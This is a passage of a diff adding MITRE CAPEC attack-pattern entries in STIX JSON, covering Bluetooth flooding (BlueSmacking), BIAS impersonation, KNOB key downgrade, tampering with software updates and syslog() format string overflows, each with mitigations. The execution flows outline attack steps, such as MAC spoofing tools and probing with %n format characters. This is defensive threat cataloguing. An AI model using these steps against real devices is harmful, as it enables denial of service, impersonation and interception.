"2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5186383a-023d-4ef1-918a-0f11c9d14b4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f2cc64b5-cdfa-4640-bb2f-f11ccbab73cc", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Set Security Level to SL3 for Thunderbolt 2 system port", + "id": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25053510-6191-4eb9-928f-471d5618f597", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b322aa23-69d1-474e-82a2-1f71903f29a4", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable PCIe tunneling to set Security Level to SL3", + "id": 
"course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae02655e-7790-4816-8ebd-c5291df0de36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dba3df8-f407-4d52-9881-92f01e7b5f77", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Boot Camp upon MacOS systems", + "id": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-665-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd286fbd-f1da-41de-9516-8d195eb182a9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0bb9f6d-50f7-44ad-a3f9-116580f0424d", + "spec_version": "2.1", + "target_ref": "attack-pattern--4317ab6c-93e4-4c5a-a814-0cd2752c61b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", 
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses Bluetooth flooding to transfer large packets to Bluetooth enabled devices over the L2CAP protocol with the goal of creating a DoS. This attack must be carried out within close proximity to a Bluetooth enabled device.", + "external_references": [ + { + "external_id": "CAPEC-666", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/666.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Amrita Mitra, What is BlueSmack Attack?, 2017--03---08, The Security Buddy", + "external_id": "REF-655", + "source_name": "reference_from_CAPEC", + "url": "https://www.thesecuritybuddy.com/bluetooth-security/what-is-bluesmack-attack/" + } + ], + "id": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BlueSmacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for Bluetooth Enabled Devices: Using BlueZ along with an antenna, an adversary searches for devices with Bluetooth on.

  2. Techniques
    Note the MAC address of the device you want to attack.

Experiment

  1. Change L2CAP Packet Length: The adversary must change the L2CAP packet length to create packets that will overwhelm a Bluetooth enabled device.

  2. Techniques
    An adversary downloads and installs BlueZ, the standard Bluetooth utility package for Linux.

Exploit

  1. Flood: An adversary sends the packets to the target device, and floods it until performance is degraded.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application has Bluetooth enabled." + ], + "x_capec_skills_required": { + "Low": "An adversary only needs a Linux machine along with a Bluetooth adapter, which is extremely common." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth when not being used.", + "id": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cf51b79-b6f1-4956-b6cc-c945dbe525c1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5dcbac0-5e5f-43b5-bafd-3e3255fe84b2", + "spec_version": "2.1", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80201cde-dfb2-4b73-bfb8-7f01b83d2d4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

  2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable Bluetooth in public places.", + "id": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b477928d-f597-4e68-8812-a8bc335d9bfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d13642f-44e3-480c-b907-c2114df19379", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify incoming Bluetooth connections; do not automatically trust.", + "id": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--51b85277-07df-4319-8d21-1fef2587765e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c0001e8c-8758-4434-ba10-32c5b2334ce1", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default PIN passwords and always use one when connecting.", + "id": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-667-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e6624f4-6e7b-4594-8b02-e56c9aca7173", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c56e3d38-c305-47a5-bdfa-bc5c1c578973", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. 
The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.", + "external_references": [ + { + "external_id": "CAPEC-668", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/668.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Data Manipulation: Transmitted Data Manipulation", + "external_id": "T1565.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1565/002" + }, + { + "description": "Jovi Umawing, Bluetooth vulnerability can be exploited in Key Negotiation of Bluetooth (KNOB) attacks, 2019--08---21, MalwareBytes", + "external_id": "REF-657", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/awareness/2019/08/bluetooth-vulnerability-can-be-exploited-in-key-negotiation-of-bluetooth-knob-attacks/" + } + ], + "id": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Key Negotiation of Bluetooth Attack (KNOB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Given users Alice, Bob and Charlie (Charlie being the attacker), Alice and Bob begin to agree on an encryption key when connecting. While Alice sends a message to Bob that an encryption key with 16 bytes of entropy should be used, Charlie changes this to 1 and forwards the request to Bob and continues forwarding these packets until authentication is successful." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery: Using an established Person in the Middle setup, search for Bluetooth devices beginning the authentication process.

  2. Techniques
    Use packet capture tools.

Experiment

  1. Change the entropy bits: Upon recieving the initial key negotiation packet from the master, the adversary modifies the entropy bits requested to 1 to allow for easy decryption before it is forwarded.

Exploit

  1. Capture and decrypt data: Once the entropy of encryption is known, the adversary can capture data and then decrypt on their device.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Person in the Middle network setup." + ], + "x_capec_resources_required": [ + "Bluetooth adapter, packet capturing capabilities." + ], + "x_capec_skills_required": { + "Medium": "Ability to modify packets." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Newer Bluetooth firmwares ensure that the KNOB is not negotaited in plaintext. Update your device.", + "id": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-668-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7a3fb48-d2a9-46e6-b2e1-3e971c6ab1d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40ed234-cae5-4a4e-9080-d0b461edab63", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary with access to an organization’s software update infrastructure inserts malware into the content of an outgoing update to fielded systems where a wide range of malicious effects are possible. 
With the same level of access, the adversary can alter a software update to perform specific malicious acts including granting the adversary control over the software’s normal functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-669", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/669.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + }, + { + "description": "Melinda Reed, John F. 
Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + } + ], + "id": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Alteration of a Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n A subcontractor to a software developer injects maliciously altered software updates into an automated update process that distributes to government and commercial customers software containing a hidden backdoor.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify software with frequent updates: The adversary must first identify a target software that has updates at least with some frequency, enough that there is am update infrastructure.

Experiment

  1. Gain access to udpate infrastructure: The adversary must then gain access to the organization's software update infrastructure. This can either be done by gaining remote access from outside the organization, or by having a malicious actor inside the organization gain access. It is often easier if someone within the organization gains access.

Exploit

  1. Alter the software update: Through access to the software update infrastructure, an adversary will alter the software update by injecting malware into the content of an outgoing update.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have penetrated an organization’s software update infrastructure including gaining access to components supporting the configuration management of software versions and updates related to the software maintenance of customer systems." + ], + "x_capec_skills_required": { + "High": "Skills required include the ability to infiltrate the organization’s software update infrastructure either from the Internet or from within the organization, including subcontractors, and be able to change software being delivered to customer/user systems in an undetected manner." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b27d91b7-66f1-4a0d-a25b-c73cadad30b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3576f50-4c2f-4c57-855a-1f4b066ac7ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "spec_version": "2.1", + "target_ref": "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. 
There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.", + "external_references": [ + { + "external_id": "CAPEC-67", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/67.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Format String", + "external_id": "06", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "scut, team teso, Exploiting Format String Vulnerabilities", + "external_id": "REF-503", + "source_name": "reference_from_CAPEC", + "url": "http://doc.bughunter.net/format-string/exploit-fs.html" + }, + { + "description": "Halvar Flake, Auditing binaries for security vulnerabilities", + "external_id": "REF-504", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt" + }, + { + "description": "Fortify Taxonomy of Vulnerabilities, Fortify Software", + "external_id": "REF-505", + "source_name": "reference_from_CAPEC", + "url": "https://vulncat.hpefod.com/en" + }, + { + "description": "Syslog man page", + "external_id": "REF-506", + "source_name": "reference_from_CAPEC", + "url": "http://www.rt.com/man/syslog.3.html" + } + ], + "id": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "modified": "2022-09-29T00:00:00.000Z", + "name": "String Format Overflow in syslog()", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + 
"x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote adversaries to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

  2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.
  3. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
